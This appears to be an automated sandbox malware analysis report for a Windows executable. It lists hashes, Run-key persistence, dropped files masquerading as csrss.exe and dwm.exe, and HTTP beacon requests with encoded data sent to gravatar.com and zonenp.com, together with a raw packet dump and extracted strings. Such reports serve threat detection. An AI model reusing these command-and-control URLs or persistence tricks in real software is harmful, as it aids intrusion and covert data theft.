Analysis Date2014-09-02 19:19:04
MD547946f267ddc94e9a0487e3bf8d92b33
SHA199936554cb5d44d8c76aee2f1905d81fae5b4129

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f804b85557da0042bac560aa40114c10 sha1: ec42dc2ea8a31047d8d9488689769de87e486ef9 size: 166912
Section.rdata md5: ae5280fc9541ee6566d704283276c159 sha1: f39d1f3d657223514dd56d63e1eaddb2808a354b size: 2048
Section.data md5: be2d095eb694aa967102ff876e1b467e sha1: 9870edb02fbf44de9a462a5767717f9c04106d65 size: 15872
Section.tls md5: 61645ea54bdc736772de33752424fa32 sha1: 9f8e7691f3674645afc27eb76058e1ac07d8f446 size: 512
Timestamp2005-09-08 13:42:38
VersionPrivateBuild: 1065
PEhash380cb2001f99f3b031e50b9fd760bb98bb5af8ed
IMPhash94c0f1072837483af5b03f0902433934

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSgravatar.com
Winsock DNSelworldonline.com
Winsock DNSzonenp.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.241
DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSgravatar.com
Type: A
192.0.80.240
DNSzonenp.com
Type: A
202.124.241.178
DNSelworldonline.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be1?v85=75&tq=gJ4WK%2FSUh7TFlER8oY%2BQtMWTUj26kJH7yZVaK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP GEThttp://zonenp.com/blog/images/3521.jpg?v22=68&tq=gKZEtzyMv5rJqxG1J42pzMffBvQs0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.241:80
Flows TCP192.168.1.1:1032 ➝ 202.124.241.178:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626531 3f763835   bcfe64067be1?v85
0x00000040 (00064)   3d373526 74713d67 4a34574b 25324653   =75&tq=gJ4WK%2FS
0x00000050 (00080)   55683754 466c4552 386f5925 32425174   Uh7TFlER8oY%2BQt
0x00000060 (00096)   4d575455 6a32366b 4a483779 5a56614b   MWTUj26kJH7yZVaK
0x00000070 (00112)   25324225 32466278 57713153 666b4959   %2B%2FbxWq1SfkIY
0x00000080 (00128)   55424d20 48545450 2f312e30 0d0a436f   UBM HTTP/1.0..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a486f73 743a2067 72617661 7461722e   .Host: gravatar.
0x000000b0 (00176)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000d0 (00208)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7632 323d3638   /3521.jpg?v22=68
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42765173   qxG1J42pzMffBvQs
0x00000040 (00064)   30656a62 77766753 39313758 3635724a   0ejbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   7a6f6e65 6e702e63 6f6d0d0a 41636365   zonenp.com..Acce
0x00000090 (00144)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x000000a0 (00160)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x000000b0 (00176)   0d0a0d0a 0a416363 6570743a 202a2f2a   .....Accept: */*
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000d0 (00208)   7a696c6c 612f322e 300d0a0d 0a         zilla/2.0....


Strings
..J...&|z.%^j.w.$ .
.".Y.
..
.jsU..N
u.N....&.
}9.@Y.....
.5J
...i-
.u..1....
R...
*..
0.%..>.
o.
.hM..........
.]
.zS..`N...
.
..CH
...
....
D.p}?..>+x....=.(
.
.P...]..qi..
..
040904b0
1065
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
068D2l
4<]5yE
4K\>|/0
7=?K^+
85oz9C
8N9Y[,
%>9<ky
a6XOV:
ABzXUv
b~{h2p
CallNextHookEx
ChildWindowFromPoint
|` CJVH
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
ED>d<j
EmptyClipboard
EnumResourceNamesA
e&q!$f
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
GWzB]S?<
hK[iI.
;HO(ZD
iCoboYm
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
}J.)Hh
Ji596t(
jmp}A-kF
JRichu
**J/vOg
+JxY4W
JXzvRAL
KERNEL32.dll
KFLEW&
k}*K+^5a
LD"2T7cp
@LK1sD
llL4ID
LocalAlloc
LockFile
N1pMPd
NdrClientCall
OKJWU>9h
,p(h3lB
`.rdata
RealGetWindowClass
RegisterClassW
R=fd|d
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
>S_~*l!k[
~s%\tl
TerminateProcess
!This program cannot be run in DOS mode.
ToAscii
=TTiZr
u9i?^=
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
v(hJi}
v)v|UE
^; "_w
WinHelpW
wlt~;f
~w*(+p
wPfBi\in
?wZ	61
*|Xo]u3
].yjH[
}zK@*g5&